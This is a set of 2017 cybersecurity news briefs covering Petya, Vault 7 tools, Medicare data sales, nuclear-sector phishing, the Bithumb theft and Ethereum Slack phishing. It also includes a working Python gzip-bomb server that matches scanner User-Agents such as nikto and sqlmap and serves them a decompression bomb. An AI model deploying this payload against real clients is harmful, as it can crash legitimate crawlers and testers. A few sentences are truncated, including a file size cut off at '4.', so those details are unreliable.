Ukraine cyber police seize servers at centre of ‘Petya’ outbreak as ‘new activity’ detected :
Ukraine’s national cybercrime unit seized servers belonging to a small company at the centre of a global outbreak of malicious software after “new activity” was detected there, the service said in a statement early on Wednesday (5 July). The company has been the focus of intense attention from authorities and cybersecurity researchers since it was identified as patient zero of the outbreak, which crippled computers at several multinational firms and knocked out cash machines, petrol stations and bank branches in Ukraine. The company, which makes the M.E.Doc accounting software, has given various explanations for its role in the outbreak: it called allegations that it had seeded the outbreak “clearly erroneous”, but later said it was cooperating with authorities. Adding to the intrigue, the bitcoin wallet linked to the attackers behind the outbreak was emptied at around the same time as the police announcement. Ukrainian authorities have blamed Russia for masterminding the outbreak, although several independent experts say it is too early, based on what is publicly known, to come to any firm conclusions. Russian companies were reportedly affected as well; Russian state-owned oil giant Rosneft said on Monday that it had taken six days to fully repair its computer systems after they were badly hit in the attack. Hanna Rybalka, who works at the Kiev headquarters of the state-owned Oschadbank, said the bank had taken nearly a week to recover. “Today is the first day of full-time work,” she said in a Facebook message on Monday. Law firm DLA Piper said late on Sunday that it had restored its email service and was working to bring its other networks back online.
WikiLeaks new dump reveals CIA malware BothanSpy and Gyrfalcon targeting Windows and Linux :
WikiLeaks has dumped its newest Vault 7 documents, detailing the capabilities of two alleged CIA hacking tools dubbed BothanSpy and Gyrfalcon. The malware payloads have allegedly been designed to steal SSH credentials from systems running Windows and Linux respectively. According to WikiLeaks, BothanSpy targets the Xshell SSH client on Windows to steal user credentials, such as the username, password, file name of the private SSH key and the key’s passphrase, for all active SSH sessions. “BothanSpy can exfiltrate the stolen credentials to a CIA-controlled server (so the implant never touches the disk on the target system) or save it in an encrypted file for later exfiltration by other means,” WikiLeaks said. Gyrfalcon goes after Linux platforms, including CentOS, Debian, RHEL, SUSE and Ubuntu. “The implant can not only steal user credentials of active SSH sessions, but is also capable of collecting full or partial OpenSSH session traffic.” Gyrfalcon is allegedly installed and configured via a rootkit developed by the agency. In other words, the two alleged implants would let spies harvest SSH credentials and session contents from machines they had already compromised, and then move on to every host those credentials unlock, likely without being detected. The practical lesson is that an implant on the client endpoint sees whatever the SSH client sees: a passphrase protects a private key against theft of the file at rest, not against a hooked client on the host where the passphrase is typed. Previous dumps have detailed the other alleged hacking tools the agency used against various operating systems and devices, giving a glimpse of the CIA’s pervasive technical capabilities.
Here’s how to protect your website from hackers – create a Zip file ‘bomb’ :
Hackers keep getting smarter, and it is commonplace for companies and organisations to have their websites taken offline or broken into to steal sensitive customer financial information. Attackers commonly use web vulnerability scanners to discover vulnerable websites. These scanners are programmed to poke away at a site, going through a list of popular known security vulnerabilities, until they find one that the website’s owners have not patched. Of course, the best defence is to make sure that your website and servers are updated with the latest software patches as soon as new security vulnerabilities are discovered. However, there is always a chance you might miss one, or that attackers might find security vulnerabilities the good guys have not yet discovered and use them to their advantage. Independent security researcher Christian Haschek has come up with an idea to stop such scanners in their tracks, especially if your website is built on WordPress, which has a long history of security flaws. If you create a gzip file that is tiny when compressed but enormous when expanded, and implement a PHP script he has written, then every time a vulnerability scanner starts in on your website you can “bomb” it by causing the scanner to freeze up. You can download a 42KB file that someone else has made, but do not open it, or your PC’s hard drives will run out of space, since once extracted the true file size is actually 4. Haschek tested the script and found that it was able to crash Google Chrome, Edge, Internet Explorer 11, Nikto and SQLMap, which seems a fitting retribution for the hackers, though it also means the payload must never be served to ordinary visitors.
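The technique described above, re-implemented in Python as an added example; this is not Haschek’s PHP script or any code from the original article. As I understand his approach, the server keeps a pre-built gzip file and returns it with a `Content-Encoding: gzip` header only to clients whose User-Agent matches a scanner, so that the tool inflates the whole thing in memory. The scanner User-Agent substrings, the 1 GiB inflated size, the listening port and the function names are assumptions for illustration.

```python
"""Gzip-bomb responder for web vulnerability scanners (added example).

Python re-implementation of the idea, not Haschek's own PHP script: build a
tiny gzip stream that inflates to a huge run of zeros, and send it with
`Content-Encoding: gzip` only to requests whose User-Agent looks like a
scanner. The User-Agent substrings, payload size and port are assumptions.
"""
import gzip
import io
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumption: substrings seen in the default User-Agent of common scanners.
# Any tool can rewrite its User-Agent, so this is a tripwire, not a control.
SCANNER_UA_RE = re.compile(r"nikto|sqlmap|nessus|acunetix|w3af|nmap", re.IGNORECASE)

NORMAL_BODY = b"<html><body>Nothing to see here.</body></html>\n"


def is_scanner_ua(user_agent):
    """True when the User-Agent header matches a known scanner signature."""
    return bool(user_agent) and SCANNER_UA_RE.search(user_agent) is not None


def build_gzip_bomb(inflated_size, chunk=1 << 20):
    """Return gzip bytes that inflate to `inflated_size` zero bytes.

    Zeros are fed through the compressor a chunk at a time, so the inflated
    data never exists in memory at once; deflate compresses runs of zeros at
    close to its ~1000:1 ceiling, so 1 GiB inflated costs about 1 MiB on the wire.
    """
    buf = io.BytesIO()
    zeros = b"\0" * chunk
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        remaining = inflated_size
        while remaining > 0:
            n = min(chunk, remaining)
            gz.write(zeros[:n])
            remaining -= n
    return buf.getvalue()


def gzip_isize(data):
    """Inflated length declared in the gzip trailer (ISIZE, little-endian, mod 2**32).

    A four-byte sanity check that avoids inflating the bomb to measure it.
    """
    return int.from_bytes(data[-4:], "little")


def response_for(user_agent, bomb):
    """Decide what to send as (status, headers, body).

    Scanners get the bomb with a gzip Content-Encoding; Content-Length is the
    compressed length, which is what the HTTP layer must see. Everyone else
    gets a plain page, so a human with a real browser is never hit.
    """
    if is_scanner_ua(user_agent):
        headers = {
            "Content-Type": "text/html",
            "Content-Encoding": "gzip",
            "Content-Length": str(len(bomb)),
        }
        return 200, headers, bomb
    headers = {"Content-Type": "text/html", "Content-Length": str(len(NORMAL_BODY))}
    return 200, headers, NORMAL_BODY


class BombHandler(BaseHTTPRequestHandler):
    bomb = b""  # filled in by serve()

    def do_GET(self):
        status, headers, body = response_for(self.headers.get("User-Agent", ""), self.bomb)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


def serve(inflated_size=1 << 30, host="127.0.0.1", port=8080):
    """Build the bomb once (assumed 1 GiB inflated) and serve it on the given port."""
    BombHandler.bomb = build_gzip_bomb(inflated_size)
    print(f"bomb: {len(BombHandler.bomb)} bytes on the wire, {inflated_size} bytes inflated")
    HTTPServer((host, port), BombHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Two caveats before deploying anything like this. It only affects clients that honour `Content-Encoding` and inflate the whole body in memory; a scanner whose User-Agent has been changed, or that caps decompression, walks straight past it, and it does nothing about the vulnerability the scanner would have found. And the match list is the dangerous part: a legitimate crawler or an authorised tester you forgot to tell will be bombed just as happily as an attacker, so keep the signatures narrow and log every hit.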
Hackers are selling healthcare details of ‘any Australian citizen’ on dark web for £17 each :
A hacker on the dark web is reportedly selling access to individual records taken from Australia’s healthcare system for as little as £17 ($22) each. In Australia, Medicare is the universal healthcare system managed by the Department of Human Services. The data, allegedly obtained via a vulnerability in government computer networks, was listed under the title “the Medicare machine”. Guardian Australia, which verified the vendor’s claims by requesting a portion of one of its own journalists’ details, found that the hacker was claiming to be able to access the Medicare details of any Australian citizen; the vendor is believed to have sold at least 75 Medicare files since October 2016. Paul Power, an IT specialist, said that if a hacker has a citizen’s name, date of birth and Medicare card number, they could potentially also log into My Health Record, a centralised repository of patient data, and then hold the victim to ransom. Alan Tudge, the human services minister responsible for healthcare matters, attempted to play down the danger, telling media outlets that it would be “fear-mongering” to suggest that full citizen health records could be obtained with a Medicare card number alone. A spokesperson for the Department of Human Services said the government is now working with security services to investigate the sale of the alleged Medicare card records, adding: “The department takes every precaution to protect the sensitive information of Australians, and to safeguard the payments we make on behalf of the Australian government.” “The revelation that Australians’ Medicare identities are available for purchase on the dark web is incomprehensible,” the pair said.
Nuclear hack: US nuclear power plants are now being targeted by hackers :
Hackers have reportedly been targeting the computer networks of companies that operate nuclear power plants and manufacturing facilities, as well as other energy firms, across the US and other countries. The New York Times reported that one of the companies targeted was Wolf Creek Nuclear Operating Corporation, which operates a nuclear power plant in Kansas. The attackers reportedly emailed malware-laced Word attachments to senior industrial control engineers in an attempt to steal credentials and gain access to systems, and also reportedly used watering-hole and man-in-the-middle (MITM) attacks to lure victims. Two unnamed sources told the Times that those targeted were industrial control engineers with direct access to systems that, if disrupted, could lead to explosions, spills of hazardous material or fire. Wolf Creek officials reportedly said that none of its plant operations systems were affected and that its corporate network was separate from the one used to run the plant; stolen engineer credentials are precisely the kind of foothold used to cross such a boundary, so that separation is worth verifying rather than assuming. Investigators have reportedly yet to identify the malware used in the attacks. Nuclear and energy plants have come under growing threat in recent years: over the past few years attackers have developed customised malware such as Industroyer and Irongate that specifically targets industrial control systems. The escalated threat means that companies running nuclear and energy plants are now under pressure to ramp up their security measures.
Hackers steal ‘billions’ from huge South Korean ethereum and bitcoin exchange :
An internet watchdog in South Korea is probing a cyberattack against Bithumb, one of the country’s dominant cryptocurrency exchanges, after data relating to more than 30,000 users was exposed and more than a billion won, the local currency, was allegedly drained from accounts. According to BraveNewCoin, Bithumb is the largest bitcoin and ethereum exchange in South Korea and one of the five largest bitcoin exchanges in the world; it is currently one of the biggest ethereum exchanges in the country by volume, reportedly accounting for more than 44% of South Korea’s trading in that currency alone. The state-run Korea Internet and Security Agency (KISA) was first contacted by Bithumb on 30 June to report that personal data had leaked from its systems after an employee’s home PC was hacked. The firm said the number of affected customers was roughly 3% of its user base. The hackers then reportedly used “voice phishing” (vishing) to gain full access to accounts: one victim told BraveNewCoin that an attacker “posed as an executive at Bithumb” in a phone call, claiming the firm had found suspicious foreign activity on the account. Tech website Motherboard pointed to Naver, which it likened to a South Korean Reddit, where furious Bithumb members complained of losing digital currency after the attack; one alleged victim there claimed 7,100,000 won (£4,770, $6,000) had been drained from an account. In April this year another South Korean exchange, Yapizon, lost the equivalent of millions of US dollars after hackers infiltrated its network and stole more than 3,800 bitcoin from users.
Terrorists can get their hands on WMDs via tech available on Dark Web – UN :
The UN has warned of the risk of terrorists gaining access to weapons of mass destruction (WMDs) by getting their hands on advanced technologies available on the dark web. Izumi Nakamitsu, the UN’s High Representative for Disarmament Affairs, said that tech products such as 3D printers and drones, readily available for purchase in dark web marketplaces, could make it easier for terrorists to create or acquire WMDs. “The possibility of non-state actors, including terrorists, acquiring weapons of mass destruction remains a significant threat to global security, and the international community must step up its efforts to ensure that the disastrous scenario of WMD terrorism is avoided,” Nakamitsu said. 3D printers have already been used to produce guns and other weapons such as plastic knives and even grenade launchers, and drones could be used to deliver weapons undetected. Underground marketplaces, which range from invite-only forums to less discerning hubs, are rife with stolen and illegal goods, from physical weapons to cyber weapons, and the dark web is a hotbed of activity not just for cybercriminals but for malicious entities of many kinds. In a separate report, the UN also described how the dark web has become a thriving venue for drug trafficking: between 2013 and 2016, dark web drug transactions grew by nearly 50% a year.
Ethereum under siege: Scammers make $700,000 in 6 days from Slack and Reddit phishing attacks :
Scammers have stolen $682,000 since 7 July through malicious phishing messages sent over Slack and malicious private messages sent to users on Reddit. Instead of forums, many mining pools, wallet services and information sites now host chatrooms on the customisable cloud-based chat platform Slack, which supports multiple channels, so developers of wallets and mining pools can talk in private channels while also running public ones. Cybercriminals are capitalising on these communities by infiltrating them and impersonating Slack’s official chatbot, Slackbot, to send fake custom messages, apparently from administrators, to every member of a Slack team. The messages claim that the MyEtherWallet service has been hacked and advise users to log into their wallet and check their balance to see whether they have lost any money. If the user clicks the hyperlink in the message, they are taken to a malicious website impersonating the wallet service; if they try to log in, their details are harvested by the cybercriminals, who then use them to access the victims’ real wallets and steal their funds. MyEtherWallet has not been hacked: there has never been any danger of MyEtherWallet being compromised, and the service’s core developers want users to be more alert to scammers. MyEtherWallet.com is the official site; the fake MyEtherWallet phishing sites use other domains hosted in Russia. “Nothing is actually at risk because the service does not store any user information and has not been compromised in any way,” the core developers said, which is also why the phishers need the victim to hand over the login details themselves. Over 100 Slack communities are currently known to have been hit by the phishing messages, and tens of thousands of users on both the ETH and ETC forks are at risk.
New Android malware will leak your private photos to friends unless you pay up :
Thousands of Android users may be at risk from a newly discovered form of malware that attempts to extort victims by threatening to leak a trove of personal information, including photos, browsing history and text messages, unless a “ransom” is paid to the hackers. Dubbed “LeakerLocker” by experts from cybersecurity firm McAfee, it demands $50 (£39) per victim to prevent the release of potentially sensitive data, which also includes Facebook chats, GPS locations and email correspondence, to the device’s stored contacts. It is a departure from the traditional approach of mobile ransomware, which typically keeps sensitive files locked with strong encryption until a fee is paid. “Unlike most ransomware variants, the target here is the victim’s reputation rather than their files,” the experts wrote in a blog post. Taking Booster & Cleaner Pro as an example, McAfee’s Fernando Ruiz and ZePeng Chen explained in their analysis that the malicious payload only works if the victim grants it a slew of elevated permissions at installation. When launched for the first time, the fake booster app, advertised as a way of speeding up a device, appears legitimate, but its covert activity quickly kicks in: it locks the victim’s home screen with an overlay displaying the ransom note, and it is able to show the victim’s private data (because the victim unwittingly granted it access) from the background. The note warns: “In less than 72 hours this data will be sent to every person. The operators may be bluffing, since “not all the private data” the malware claimed to have accessed was actually read, the experts said. Their advice to users of infected devices: do not pay the ransom.
Who has your back? How tech firms rank at protecting your privacy against government surveillance :
The Electronic Frontier Foundation (EFF) released its annual “Who has your back” report for 2017 on Monday (10 July), gauging how well tech giants protect sensitive user data against government surveillance and intervention. The EFF evaluated 26 major tech companies on how well they lived up to expectations and adopted best practices to protect their users’ information when government agencies seek data, using five categories to gauge each firm’s public policies and how well it stands up for user privacy: following industry-wide best practices, informing users about government data requests, promising not to sell out users, standing up to National Security Letter (NSL) gag orders, and supporting reform of the National Security Agency’s (NSA) Section 702 surveillance programme. Only a handful of tech companies achieved a perfect five-star rating; according to the EFF, nine companies earned stars in all five categories this year: Adobe, Credo, Dropbox, Lyft, Pinterest, Sonic, Uber, Wickr and WordPress. Tech giants Google, Microsoft, Facebook and LinkedIn each lost a star for failing to stand up to NSL gag orders. The EFF also singled out Amazon and WhatsApp as lagging: “While both companies have done significant work to defend user privacy — EFF especially lauds WhatsApp’s move to adopt end-to-end encryption by default for its billion users around the world — their policies still lag behind,” the EFF wrote. Meanwhile, the major telecommunications companies (AT&T, Comcast, T-Mobile and Verizon) were the lowest-rated firms, with just one star each, for following industry-wide best practices. “The tech industry as a whole has moved toward providing its users with more transparency, but telecommunications companies — which serve as the pipeline for communications and Internet service for millions of Americans — are failing to publicly push back against government overreach,” EFF Senior Staff Attorney Nate Cardozo said in a statement.